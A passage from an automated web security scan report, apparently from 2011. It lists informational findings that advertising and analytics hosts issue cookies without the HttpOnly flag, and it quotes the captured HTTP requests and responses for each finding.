rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFecPC7nMQFmLKHV2YkRHDFb4MHts9wYbNBNVkVMlSqYeIB48s6jNq5rQRfJuujAOkBmKgLSisXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kb/UXziqs3OeNfF8Ao1v9+u7SMzxg3Di8QrmRiZeiI7/W1J7gLPe3aStI9uT91NmYsK/+20IUfTD2rpLQyT66Y1DyWp2L4xjiTUCECLmgubnP; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:51 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:49:50 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

12.60. http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1008211/66697159.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1008211/66697159.js?D=DM_LOC%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Ftopics%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Fpost%252F2011%252F09%252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%252F1%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="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"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_o6zg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZkg8RmyafY39+OIzF9755x3W+AzJvvU=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UWJs=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKlxLHFKzz4/0koCkSq5JBQoSmi7zZNoLT0dEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgq9z/0E1nIO9J9fupr6fHiqjuefo+lRV1atV4Hbe4J0B6z/RoE1OlugGgSP3MMlt9IUJJODkKZG3Nw4/m9kHTtC0hHopLYwirAifOKc5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGbzaZd2dky0d4PEM7QRN8YWclW7vMsiT9xDxB5BqTRyycw9kjP7n9k0mBN23/26VyDWsQXbFP9hc6xcdJ56gbc9aoDyd417qJh1f5VYyOgv3kiC8XFanPbQJ092ArYD50B0UuBaXIAGAg5g=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:49:53 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

12.61. http://pixel.mathtag.com/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match&mm_bnc,%20http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4e62cac5-3093-5789-301b-6f4e7fbf3921; ts=1315097285

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f38 32568
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 00:56:32 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315097792; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:56:32 GMT
Content-Length: 0


12.62. http://r.casalemedia.com/rum

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /rum

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rum?cm_dsp_id=4&external_user_id=2925993182975414771 HTTP/1.1
Host: r.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMS=102679&1315097055; CMSC=TmLJ3w**; CMDD=AAF1owE*; CMD1=AAFehU5iyd8AAZEXAAOXuwEBAA**; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMST=TmLJ305iysIC; CMIMP=102679&1315097282

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 00:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:56:38 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=e9e8c1d58f5f3be19a1c66cf;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
Set-Cookie: CMPS=054;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:56:38 GMT
Set-Cookie: CMPP=002;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:56:38 GMT
Set-Cookie: CMRUM2=04000000002925993182975414771;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
Set-Cookie: CMST=TmLJ305izMYG;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:56:38 GMT

GIF89a.............!.......,...........D..;

12.63. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=2925993182975414771 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:48 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Tue, 03-Sep-2013 00:56:48 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.64. http://r.turn.com/r/bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=54&cver=1&uid=6422714091563403120 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=8071372312438671107; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:58:56 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:58:55 GMT

GIF89a.............!.......,...........D..;

12.65. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=ItQwH2bCmVTfAECOql6s6SBT_BPJF-JVRX_nTmRBhFpwzH1UaDhfAXHNoQU6yinlbmW-EFxMQzXn3d_bHBz1AQ&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:47:35 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1166786&t=2
Content-Length: 0
Date: Sun, 04 Sep 2011 00:47:35 GMT


12.66. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=6981538011179690654; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:57:37 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:57:36 GMT

GIF89a.............!.......,...........D..;

12.67. http://rma-api.gravity.com/v1/beacons/initialize

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839

Response

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 70
Date: Sun, 04 Sep 2011 01:01:00 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b39839');

12.68. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgdv12=1; lgdv6=1; lgdv95=1; lgdv73=1; lgtix=BgABADMBSQABADMBHAABADMBDAABADMB/QABADABXwABADMB

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:19 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAADADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:52:19 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

12.69. http://sitelife.usatoday.com/ver1.0/Content/direct/scripts/DirectProxyFast.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/direct/scripts/DirectProxyFast.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/direct/scripts/DirectProxyFast.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 63167
Content-Type: application/x-javascript
Last-Modified: Sat, 03 Sep 2011 08:35:54 GMT
Accept-Ranges: bytes
ETag: "0116f7e146acc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:47:50 GMT
Connection: close

...
if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=A[C].split(".");E=YAHOO;for(B=(D[0]=="YAHOO")?1:0;B<D.length
...[SNIP]...

12.70. http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif?&dcsdat=1315097328762&dcssip=www.reuters.com&dcsuri=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&dcsref=http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&WT.co_f=50.23.123.106-4086325760.30173190&WT.vtid=50.23.123.106-4086325760.30173190&WT.vtvs=1315097075506&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Notre%20Dame,%20Michigan%20stadiums%20cleared%20due%20to%20storms%20|%20Reuters&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1233x1037&WT.fv=10.3&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ssl=0&WT.es=www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&WT.cg_n=News%20-%20US&WT.cg_s=domesticNews&WT.vt_f_tlh=1315097075&ChannelList=domesticNews;Disaster;Honda;Inspiration;everything;treasuryMarkets;Deals;Shell;Amtrak;Amtrak2;yahoo3;VerizonMap;echoActivityStream;ShellEnergy;Hyundai;everythingButHugin;SprintNow;OutloudFeed;CFA;samsung&ModID=domesticNews|Text|13827288_Most%20Read%20Articles;domesticNews|Text|13827289_Most%20Shared%20Articles;domesticNews|Text|13827290_Most%20Discussed%20Articles;domesticNews|Text|13827291_Most%20Watched%20Videos;domesticNews|Text|10036174_Related%20News%20%28A